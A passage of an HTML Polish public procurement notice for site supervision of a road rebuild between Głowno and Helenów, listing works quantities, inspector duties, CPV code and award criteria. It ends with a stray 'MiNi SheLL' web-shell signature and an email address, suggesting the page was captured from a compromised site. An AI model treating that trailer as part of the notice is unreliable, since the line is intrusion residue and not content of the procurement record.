Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Przebudowa drogi gruntowej Głowno-Helenów, gm. Głowno..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1.Przedmiotem zamówienia są roboty budowlane obejmujące przebudowę drogi powiatowej Nr 5101 E relacji Głowno - Helenów w szczególności:
1)wykonanie i odbiór robót związanych z odtworzeniem trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych w pasie drogi, na długości 2,45 km,
2)wykonanie i odbiór robót związanych z wyrównaniem istniejącej podbudowy tłuczniem kamiennych  gr. 10,00 cm, na powierzchni 7980,00 m2, oraz wykonywaniem górnej warstwy podbudowy  z kruszywa łamanego stabilizowanego mechanicznie gr. 15 cm, na powierzchni 2310,00 m2, 
3)wykonanie i odbiór robót związanych z oczyszczeniem i skropieniem warstw konstrukcyjnych nawierzchni na powierzchni 10290,00  m2
4)wykonanie i odbiór robót związanych z wykonywaniem warstw konstrukcji (warstwa ścieralna) nawierzchni z betonu asfaltowego, na powierzchni 9800,00 m2
2.2. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia opisanego w pkt. 2.1. zawarte są w Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi. lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
Zakres podstawowych obowiązków i praw inspektora nadzoru wynika 
z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. Z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
1)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
2)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów 
3)urządzeń, zgłaszanych przez wykonawcę robót, szczególnie 
w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
4)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a w szczególności zapobieganie zastosowaniu wyrobów i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
5)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
6)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział 
w czynnościach odbioru robót,
7)potwierdzanie ilości wykonanych robót,
8)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
9)sprawdzanie rozliczeń Wykonawcy robót budowlanych 
i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
10)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
11)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy  z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
Termin realizacji inwestycji 30 dni kalendarzowych od dnia przekazania terenu
Okres gwarancji na wykonane prace 24 miesiące..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com